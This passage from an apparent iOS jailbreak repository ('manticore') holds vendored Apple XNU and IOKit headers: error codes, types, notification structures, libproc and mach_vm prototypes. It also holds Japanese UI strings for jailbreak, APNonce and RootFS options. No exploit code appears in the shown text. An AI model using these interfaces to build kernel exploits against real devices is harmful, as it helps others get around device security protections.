136 | #define iokit_family_err(sub, return ) (sys_iokit|sub|return)
137 | #define iokit_vendor_specific_err(return ) (sys_iokit|sub_iokit_vendor_specific|return)
138 |
139 | #define kIOReturnSuccess KERN_SUCCESS // OK
140 | #define kIOReturnError iokit_common_err(0x2bc) // general error
141 | #define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory
142 | #define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage
143 | #define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC
144 | #define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device
145 | #define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation
146 | #define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument
147 | #define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked
148 | #define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked
149 | #define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and
150 | // device already open
151 | #define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages
152 | // had different msg_id
153 | #define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function
154 | #define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure
155 | #define kIOReturnInternalError iokit_common_err(0x2c9) // internal error
156 | #define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error
157 | //#define kIOReturn???Error iokit_common_err(0x2cb) // ???
158 | #define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock
159 | #define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open
160 | #define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported
161 | #define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported
162 | #define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error
163 | #define kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error
164 | #define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open
165 | #define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure
166 | #define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure
167 | #define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy
168 | #define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout
169 | #define kIOReturnOffline iokit_common_err(0x2d7) // device offline
170 | #define kIOReturnNotReady iokit_common_err(0x2d8) // not ready
171 | #define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached
172 | #define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left
173 | #define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data
174 | //#define kIOReturn???Error iokit_common_err(0x2dc) // ???
175 | #define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists
176 | #define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down
177 | // physical memory
178 | #define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached
179 | #define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued
180 | #define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received
181 | // on interrupt port
182 | #define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted
183 | #define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device
184 | #define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present
185 | #define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted
186 | #define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode
187 | #define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun
188 | #define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun
189 | #define kIOReturnDeviceError iokit_common_err(0x2e9) // the device is not working properly!
190 | #define kIOReturnNoCompletion iokit_common_err(0x2ea) // a completion routine is required
191 | #define kIOReturnAborted iokit_common_err(0x2eb) // operation aborted
192 | #define kIOReturnNoBandwidth iokit_common_err(0x2ec) // bus bandwidth would be exceeded
193 | #define kIOReturnNotResponding iokit_common_err(0x2ed) // device not responding
194 | #define kIOReturnIsoTooOld iokit_common_err(0x2ee) // isochronous I/O request for distant past!
195 | #define kIOReturnIsoTooNew iokit_common_err(0x2ef) // isochronous I/O request for distant future
196 | #define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found
197 | #define kIOReturnInvalid iokit_common_err(0x1) // should never be seen
198 |
199 | #ifdef __cplusplus
200 | }
201 | #endif
202 |
203 | #endif /* ! __IOKIT_IORETURN_H */
204 |
--------------------------------------------------------------------------------
/manticore/include/xnu/iokit/IOKit/IOTypes.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | #ifndef __IOKIT_IOTYPES_H
29 | #define __IOKIT_IOTYPES_H
30 |
31 | #ifndef PLATFORM_DriverKit
32 |
33 | #ifndef IOKIT
34 | #define IOKIT 1
35 | #endif /* !IOKIT */
36 |
37 | #if KERNEL
38 | #include
39 | #else
40 | #include
41 | #include
42 | #endif
43 |
44 | #include
45 | #include
46 |
47 | #ifdef __cplusplus
48 | extern "C" {
49 | #endif
50 |
51 | #ifndef NULL
52 | #if defined (__cplusplus)
53 | #ifdef XNU_KERNEL_PRIVATE
54 | #define NULL nullptr
55 | #else
56 | #if __cplusplus >= 201103L && (defined(__arm__) || defined(__arm64__))
57 | #define NULL nullptr
58 | #else
59 | #define NULL 0
60 | #endif
61 | #endif
62 | #else
63 | #define NULL ((void *)0)
64 | #endif
65 | #endif
66 |
67 | /*
68 | * Simple data types.
69 | */
70 | #include
71 | //#include
72 |
73 | #if KERNEL
74 | #include
75 | #endif
76 |
77 | typedef UInt32 IOOptionBits;
78 | typedef SInt32 IOFixed;
79 | typedef UInt32 IOVersion;
80 | typedef UInt32 IOItemCount;
81 | typedef UInt32 IOCacheMode;
82 |
83 | typedef UInt32 IOByteCount32;
84 | typedef UInt64 IOByteCount64;
85 |
86 | typedef UInt32 IOPhysicalAddress32;
87 | typedef UInt64 IOPhysicalAddress64;
88 | typedef UInt32 IOPhysicalLength32;
89 | typedef UInt64 IOPhysicalLength64;
90 |
91 | #if !defined(__arm__) && !defined(__i386__)
92 | typedef mach_vm_address_t IOVirtualAddress;
93 | #else
94 | typedef vm_address_t IOVirtualAddress;
95 | #endif
96 |
97 | #if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL)) && !(defined(__arm64__) && !defined(__LP64__))
98 | typedef IOByteCount64 IOByteCount;
99 | #define PRIIOByteCount PRIu64
100 | #else
101 | typedef IOByteCount32 IOByteCount;
102 | #define PRIIOByteCount PRIu32
103 | #endif
104 |
105 | typedef IOVirtualAddress IOLogicalAddress;
106 |
107 | #if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))
108 |
109 | typedef IOPhysicalAddress64 IOPhysicalAddress;
110 | typedef IOPhysicalLength64 IOPhysicalLength;
111 | #define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32))
112 | #define IOPhysSize 64
113 |
114 | #else
115 |
116 | typedef IOPhysicalAddress32 IOPhysicalAddress;
117 | typedef IOPhysicalLength32 IOPhysicalLength;
118 | #define IOPhysical32( hi, lo ) (lo)
119 | #define IOPhysSize 32
120 |
121 | #endif
122 |
123 |
124 | typedef struct{
125 | IOPhysicalAddress address;
126 | IOByteCount length;
127 | } IOPhysicalRange;
128 |
129 | typedef struct{
130 | IOVirtualAddress address;
131 | IOByteCount length;
132 | } IOVirtualRange;
133 |
134 | #if !defined(__arm__) && !defined(__i386__)
135 | typedef IOVirtualRange IOAddressRange;
136 | #else
137 | typedef struct{
138 | mach_vm_address_t address;
139 | mach_vm_size_t length;
140 | } IOAddressRange;
141 | #endif
142 |
143 | /*
144 | * Map between #defined or enum'd constants and text description.
145 | */
146 | typedef struct {
147 | int value;
148 | const char *name;
149 | } IONamedValue;
150 |
151 |
152 | /*
153 | * Memory alignment -- specified as a power of two.
154 | */
155 | typedef unsigned int IOAlignment;
156 |
157 | #define IO_NULL_VM_TASK ((vm_task_t)0)
158 |
159 |
160 | /*
161 | * Pull in machine specific stuff.
162 | */
163 |
164 | //#include
165 |
166 | #ifndef MACH_KERNEL
167 |
168 | #ifndef __IOKIT_PORTS_DEFINED__
169 | #define __IOKIT_PORTS_DEFINED__
170 | #ifdef KERNEL
171 | #ifdef __cplusplus
172 | class OSObject;
173 | typedef OSObject * io_object_t;
174 | #else
175 | typedef struct OSObject * io_object_t;
176 | #endif
177 | #else /* KERNEL */
178 | typedef mach_port_t io_object_t;
179 | #endif /* KERNEL */
180 | #endif /* __IOKIT_PORTS_DEFINED__ */
181 |
182 | #include
183 |
184 | typedef io_object_t io_connect_t;
185 | typedef io_object_t io_enumerator_t;
186 | typedef io_object_t io_iterator_t;
187 | typedef io_object_t io_registry_entry_t;
188 | typedef io_object_t io_service_t;
189 | typedef io_object_t uext_object_t;
190 |
191 | #define IO_OBJECT_NULL ((io_object_t) 0)
192 |
193 | #endif /* MACH_KERNEL */
194 |
195 | // IOConnectMapMemory memoryTypes
196 | enum {
197 | kIODefaultMemoryType = 0
198 | };
199 |
200 | enum {
201 | kIODefaultCache = 0,
202 | kIOInhibitCache = 1,
203 | kIOWriteThruCache = 2,
204 | kIOCopybackCache = 3,
205 | kIOWriteCombineCache = 4,
206 | kIOCopybackInnerCache = 5,
207 | kIOPostedWrite = 6,
208 | kIORealTimeCache = 7,
209 | kIOPostedReordered = 8,
210 | kIOPostedCombinedReordered = 9,
211 | };
212 |
213 | // IOMemory mapping options
214 | enum {
215 | kIOMapAnywhere = 0x00000001,
216 |
217 | kIOMapCacheMask = 0x00000f00,
218 | kIOMapCacheShift = 8,
219 | kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift,
220 | kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift,
221 | kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift,
222 | kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift,
223 | kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift,
224 | kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift,
225 | kIOMapPostedWrite = kIOPostedWrite << kIOMapCacheShift,
226 | kIOMapRealTimeCache = kIORealTimeCache << kIOMapCacheShift,
227 | kIOMapPostedReordered = kIOPostedReordered << kIOMapCacheShift,
228 | kIOMapPostedCombinedReordered = kIOPostedCombinedReordered << kIOMapCacheShift,
229 |
230 | kIOMapUserOptionsMask = 0x00000fff,
231 |
232 | kIOMapReadOnly = 0x00001000,
233 |
234 | kIOMapStatic = 0x01000000,
235 | kIOMapReference = 0x02000000,
236 | kIOMapUnique = 0x04000000,
237 | #ifdef XNU_KERNEL_PRIVATE
238 | kIOMap64Bit = 0x08000000,
239 | #endif
240 | kIOMapPrefault = 0x10000000,
241 | kIOMapOverwrite = 0x20000000
242 | };
243 |
244 | /*! @enum Scale Factors
245 | * @discussion Used when a scale_factor parameter is required to define a unit of time.
246 | * @constant kNanosecondScale Scale factor for nanosecond based times.
247 | * @constant kMicrosecondScale Scale factor for microsecond based times.
248 | * @constant kMillisecondScale Scale factor for millisecond based times.
249 | * @constant kTickScale Scale factor for the standard (100Hz) tick.
250 | * @constant kSecondScale Scale factor for second based times. */
251 |
252 | enum {
253 | kNanosecondScale = 1,
254 | kMicrosecondScale = 1000,
255 | kMillisecondScale = 1000 * 1000,
256 | kSecondScale = 1000 * 1000 * 1000,
257 | kTickScale = (kSecondScale / 100)
258 | };
259 |
260 | enum {
261 | kIOConnectMethodVarOutputSize = -3
262 | };
263 |
264 | /* compatibility types */
265 |
266 | #ifndef KERNEL
267 |
268 | typedef unsigned int IODeviceNumber;
269 |
270 | #endif
271 |
272 | #ifdef __cplusplus
273 | }
274 | #endif
275 |
276 | #else /* !PLATFORM_DriverKit */
277 |
278 | #include
279 |
280 | typedef uint32_t IOOptionBits;
281 | typedef int32_t IOFixed;
282 | typedef uint32_t IOVersion;
283 | typedef uint32_t IOItemCount;
284 | typedef uint32_t IOCacheMode;
285 |
286 | typedef uint32_t IOByteCount32;
287 | typedef uint64_t IOByteCount64;
288 | typedef IOByteCount64 IOByteCount;
289 |
290 | typedef uint32_t IOPhysicalAddress32;
291 | typedef uint64_t IOPhysicalAddress64;
292 | typedef uint32_t IOPhysicalLength32;
293 | typedef uint64_t IOPhysicalLength64;
294 |
295 | typedef IOPhysicalAddress64 IOPhysicalAddress;
296 | typedef IOPhysicalLength64 IOPhysicalLength;
297 |
298 | typedef uint64_t IOVirtualAddress;
299 |
300 | #endif /* PLATFORM_DriverKit */
301 |
302 | enum {
303 | kIOMaxBusStall40usec = 40000,
304 | kIOMaxBusStall30usec = 30000,
305 | kIOMaxBusStall25usec = 25000,
306 | kIOMaxBusStall20usec = 20000,
307 | kIOMaxBusStall10usec = 10000,
308 | kIOMaxBusStall5usec = 5000,
309 | kIOMaxBusStallNone = 0,
310 | };
311 |
312 | #endif /* ! __IOKIT_IOTYPES_H */
313 |
--------------------------------------------------------------------------------
/manticore/include/xnu/iokit/IOKit/OSMessageNotification.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | /*
29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.
30 | *
31 | * HISTORY
32 | *
33 | */
34 |
35 | #ifndef __OS_OSMESSAGENOTIFICATION_H
36 | #define __OS_OSMESSAGENOTIFICATION_H
37 |
38 | #ifdef __cplusplus
39 | extern "C" {
40 | #endif
41 |
42 | #include
43 | #include
44 | #include
45 |
46 | enum {
47 | kFirstIOKitNotificationType = 100,
48 | kIOServicePublishNotificationType = 100,
49 | kIOServiceMatchedNotificationType = 101,
50 | kIOServiceTerminatedNotificationType = 102,
51 | kIOAsyncCompletionNotificationType = 150,
52 | kIOServiceMessageNotificationType = 160,
53 | kLastIOKitNotificationType = 199,
54 |
55 | // reserved bits
56 | kIOKitNoticationTypeMask = 0x00000FFF,
57 | kIOKitNoticationTypeSizeAdjShift = 30,
58 | kIOKitNoticationMsgSizeMask = 3,
59 | };
60 |
61 | enum {
62 | kOSNotificationMessageID = 53,
63 | kOSAsyncCompleteMessageID = 57,
64 | kMaxAsyncArgs = 16
65 | };
66 |
67 | enum {
68 | kIOAsyncReservedIndex = 0,
69 | kIOAsyncReservedCount,
70 |
71 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount,
72 | kIOAsyncCalloutRefconIndex,
73 | kIOAsyncCalloutCount,
74 |
75 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount,
76 | kIOMatchingCalloutRefconIndex,
77 | kIOMatchingCalloutCount,
78 |
79 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount,
80 | kIOInterestCalloutRefconIndex,
81 | kIOInterestCalloutServiceIndex,
82 | kIOInterestCalloutCount
83 | };
84 |
85 |
86 |
87 | // --------------
88 | enum {
89 | kOSAsyncRef64Count = 8,
90 | kOSAsyncRef64Size = kOSAsyncRef64Count * ((int) sizeof(io_user_reference_t))
91 | };
92 | typedef io_user_reference_t OSAsyncReference64[kOSAsyncRef64Count];
93 |
94 | struct OSNotificationHeader64 {
95 | mach_msg_size_t size; /* content size */
96 | natural_t type;
97 | OSAsyncReference64 reference;
98 |
99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
100 | unsigned char content[];
101 | #else
102 | unsigned char content[0];
103 | #endif
104 | };
105 |
106 | #pragma pack(4)
107 | struct IOServiceInterestContent64 {
108 | natural_t messageType;
109 | io_user_reference_t messageArgument[1];
110 | };
111 | #pragma pack()
112 | // --------------
113 |
114 | #if !KERNEL_USER32
115 |
116 | enum {
117 | kOSAsyncRefCount = 8,
118 | kOSAsyncRefSize = 32
119 | };
120 | typedef natural_t OSAsyncReference[kOSAsyncRefCount];
121 |
122 | struct OSNotificationHeader {
123 | mach_msg_size_t size; /* content size */
124 | natural_t type;
125 | OSAsyncReference reference;
126 |
127 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
128 | unsigned char content[];
129 | #else
130 | unsigned char content[0];
131 | #endif
132 | };
133 |
134 | #pragma pack(4)
135 | struct IOServiceInterestContent {
136 | natural_t messageType;
137 | void * messageArgument[1];
138 | };
139 | #pragma pack()
140 |
141 | #endif /* KERNEL_USER32 */
142 |
143 | struct IOAsyncCompletionContent {
144 | IOReturn result;
145 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
146 | void * args[] __attribute__ ((packed));
147 | #else
148 | void * args[0] __attribute__ ((packed));
149 | #endif
150 | };
151 |
152 | #ifndef __cplusplus
153 | typedef struct OSNotificationHeader OSNotificationHeader;
154 | typedef struct IOServiceInterestContent IOServiceInterestContent;
155 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
156 | #endif
157 |
158 | #ifdef __cplusplus
159 | }
160 | #endif
161 |
162 | #endif /* __OS_OSMESSAGENOTIFICATION_H */
163 |
--------------------------------------------------------------------------------
/manticore/include/xnu/libsyscall/wrappers/libproc/libproc.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 2006, 2007, 2010 Apple Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | #ifndef _LIBPROC_H_
24 | #define _LIBPROC_H_
25 |
26 | #include
27 | #include
28 | #include
29 | #include
30 | #include
31 | #include
32 | #include
33 | #include
34 | #include /* for audit_token_t */
35 |
36 | #include
37 |
38 | #include
39 | #include
40 |
41 | /*
42 | * This header file contains private interfaces to obtain process information.
43 | * These interfaces are subject to change in future releases.
44 | */
45 |
46 | /*!
47 | * @define PROC_LISTPIDSPATH_PATH_IS_VOLUME
48 | * @discussion This flag indicates that all processes that hold open
49 | * file references on the volume associated with the specified
50 | * path should be returned.
51 | */
52 | #define PROC_LISTPIDSPATH_PATH_IS_VOLUME 1
53 |
54 |
55 | /*!
56 | * @define PROC_LISTPIDSPATH_EXCLUDE_EVTONLY
57 | * @discussion This flag indicates that file references that were opened
58 | * with the O_EVTONLY flag should be excluded from the matching
59 | * criteria.
60 | */
61 | #define PROC_LISTPIDSPATH_EXCLUDE_EVTONLY 2
62 |
63 | __BEGIN_DECLS
64 |
65 |
66 | /*!
67 | * @function proc_listpidspath
68 | * @discussion A function which will search through the current
69 | * processes looking for open file references which match
70 | * a specified path or volume.
71 | * @param type types of processes to be searched (see proc_listpids)
72 | * @param typeinfo adjunct information for type
73 | * @param path file or volume path
74 | * @param pathflags flags to control which files should be considered
75 | * during the process search.
76 | * @param buffer a C array of int-sized values to be filled with
77 | * process identifiers that hold an open file reference
78 | * matching the specified path or volume. Pass NULL to
79 | * obtain the minimum buffer size needed to hold the
80 | * currently active processes.
81 | * @param buffersize the size (in bytes) of the provided buffer.
82 | * @result the number of bytes of data returned in the provided buffer;
83 | * -1 if an error was encountered;
84 | */
85 | int proc_listpidspath(uint32_t type,
86 | uint32_t typeinfo,
87 | const char *path,
88 | uint32_t pathflags,
89 | void *buffer,
90 | int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
91 |
92 | int proc_listpids(uint32_t type, uint32_t typeinfo, void *buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
93 | int proc_listallpids(void * buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_4_1);
94 | int proc_listpgrppids(pid_t pgrpid, void * buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_4_1);
95 | int proc_listchildpids(pid_t ppid, void * buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_4_1);
96 | int proc_pidinfo(int pid, int flavor, uint64_t arg, void *buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
97 | int proc_pidfdinfo(int pid, int fd, int flavor, void * buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
98 | int proc_pidfileportinfo(int pid, uint32_t fileport, int flavor, void *buffer, int buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_4_3);
99 | int proc_name(int pid, void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
100 | int proc_regionfilename(int pid, uint64_t address, void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
101 | int proc_kmsgbuf(void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
102 | int proc_pidpath(int pid, void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
103 | int proc_pidpath_audittoken(audit_token_t *audittoken, void * buffer, uint32_t buffersize) API_AVAILABLE(macos(10.16), ios(14.0), watchos(7.0), tvos(14.0));
104 | int proc_libversion(int *major, int * minor) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0);
105 |
106 | /*
107 | * Return resource usage information for the given pid, which can be a live process or a zombie.
108 | *
109 | * Returns 0 on success; or -1 on failure, with errno set to indicate the specific error.
110 | */
111 | int proc_pid_rusage(int pid, int flavor, rusage_info_t *buffer) __OSX_AVAILABLE_STARTING(__MAC_10_9, __IPHONE_7_0);
112 |
113 | /*
114 | * A process can use the following api to set its own process control
115 | * state on resoure starvation. The argument can have one of the PROC_SETPC_XX values
116 | */
117 | #define PROC_SETPC_NONE 0
118 | #define PROC_SETPC_THROTTLEMEM 1
119 | #define PROC_SETPC_SUSPEND 2
120 | #define PROC_SETPC_TERMINATE 3
121 |
122 | int proc_setpcontrol(const int control) __OSX_AVAILABLE_STARTING(__MAC_10_6, __IPHONE_3_2);
123 | int proc_setpcontrol(const int control);
124 |
125 | int proc_track_dirty(pid_t pid, uint32_t flags);
126 | int proc_set_dirty(pid_t pid, bool dirty);
127 | int proc_get_dirty(pid_t pid, uint32_t *flags);
128 | int proc_clear_dirty(pid_t pid, uint32_t flags);
129 |
130 | int proc_terminate(pid_t pid, int *sig);
131 |
132 | /*
133 | * NO_SMT means that on an SMT CPU, this thread must be scheduled alone,
134 | * with the paired CPU idle.
135 | *
136 | * Set NO_SMT on the current proc (all existing and future threads)
137 | * This attribute is inherited on fork and exec
138 | */
139 | int proc_set_no_smt(void) __API_AVAILABLE(macos(10.16));
140 |
141 | /* Set NO_SMT on the current thread */
142 | int proc_setthread_no_smt(void) __API_AVAILABLE(macos(10.16));
143 |
144 | /*
145 | * CPU Security Mitigation APIs
146 | *
147 | * Set CPU security mitigation on the current proc (all existing and future threads)
148 | * This attribute is inherited on fork and exec
149 | */
150 | int proc_set_csm(uint32_t flags) __API_AVAILABLE(macos(10.16));
151 |
152 | /* Set CPU security mitigation on the current thread */
153 | int proc_setthread_csm(uint32_t flags) __API_AVAILABLE(macos(10.16));
154 |
155 | /*
156 | * flags for CPU Security Mitigation APIs
157 | * PROC_CSM_ALL should be used in most cases,
158 | * the individual flags are provided only for performance evaluation etc
159 | */
160 | #define PROC_CSM_ALL 0x0001 /* Set all available mitigations */
161 | #define PROC_CSM_NOSMT 0x0002 /* Set NO_SMT - see above */
162 | #define PROC_CSM_TECS 0x0004 /* Execute VERW on every return to user mode */
163 |
164 | #ifdef PRIVATE
165 | #include
166 | /*
167 | * Enumerate potential userspace pointers embedded in kernel data structures.
168 | * Currently inspects kqueues only.
169 | *
170 | * NOTE: returned "pointers" are opaque user-supplied values and thus not
171 | * guaranteed to address valid objects or be pointers at all.
172 | *
173 | * Returns the number of pointers found (which may exceed buffersize), or -1 on
174 | * failure and errno set appropriately.
175 | */
176 | int proc_list_uptrs(pid_t pid, uint64_t *buffer, uint32_t buffersize);
177 |
178 | int proc_list_dynkqueueids(int pid, kqueue_id_t *buf, uint32_t bufsz);
179 | int proc_piddynkqueueinfo(int pid, int flavor, kqueue_id_t kq_id, void *buffer,
180 | int buffersize);
181 | #endif /* PRIVATE */
182 |
183 | int proc_udata_info(int pid, int flavor, void *buffer, int buffersize);
184 |
185 | __END_DECLS
186 |
187 | #endif /*_LIBPROC_H_ */
188 |
--------------------------------------------------------------------------------
/manticore/include/xnu/mach_vm.h:
--------------------------------------------------------------------------------
1 | //
2 | // mach_vm.h
3 | // manticore
4 | //
5 | // Created by Luca on 10.03.21.
6 | //
7 |
8 | #ifndef mach_vm_h
9 | #define mach_vm_h
10 | // Prototypes from mach/mach_vm.h
11 |
12 | #include
13 |
14 | extern
15 | kern_return_t mach_vm_allocate
16 | (
17 | vm_map_t target,
18 | mach_vm_address_t *address,
19 | mach_vm_size_t size,
20 | int flags
21 | );
22 |
23 | extern
24 | kern_return_t mach_vm_deallocate
25 | (
26 | vm_map_t target,
27 | mach_vm_address_t address,
28 | mach_vm_size_t size
29 | );
30 |
31 | extern
32 | kern_return_t mach_vm_region
33 | (
34 | vm_map_t target_task,
35 | mach_vm_address_t *address,
36 | mach_vm_size_t *size,
37 | vm_region_flavor_t flavor,
38 | vm_region_info_t info,
39 | mach_msg_type_number_t *infoCnt,
40 | mach_port_t *object_name
41 | );
42 |
43 | #endif
44 |
--------------------------------------------------------------------------------
/manticore/ja.lproj/LaunchScreen.strings:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/manticore/ja.lproj/Main.strings:
--------------------------------------------------------------------------------
1 |
2 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "0il-tf-sNa"; */
3 | "0il-tf-sNa.text" = "Manticore";
4 |
5 | /* Class = "UILabel"; text = "Set APNonce"; ObjectID = "0yi-4F-L8u"; */
6 | "0yi-4F-L8u.text" = "APNonceをセット";
7 |
8 | /* Class = "UILabel"; text = "Enable Tweaks"; ObjectID = "2Nf-dY-FJy"; */
9 | "2Nf-dY-FJy.text" = "Tweaksの有効化";
10 |
11 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "6hM-Fc-FDp"; */
12 | "6hM-Fc-FDp.normalTitle" = "脱獄";
13 |
14 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "AVZ-qX-0ms"; */
15 | "AVZ-qX-0ms.text" = "RootFSの復元";
16 |
17 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "B09-wX-UeI"; */
18 | "B09-wX-UeI.normalTitle" = "脱獄";
19 |
20 | /* Class = "UITextField"; placeholder = "0x1111111111111111"; ObjectID = "JaD-0s-nbo"; */
21 | "JaD-0s-nbo.placeholder" = "0x1111111111111111";
22 |
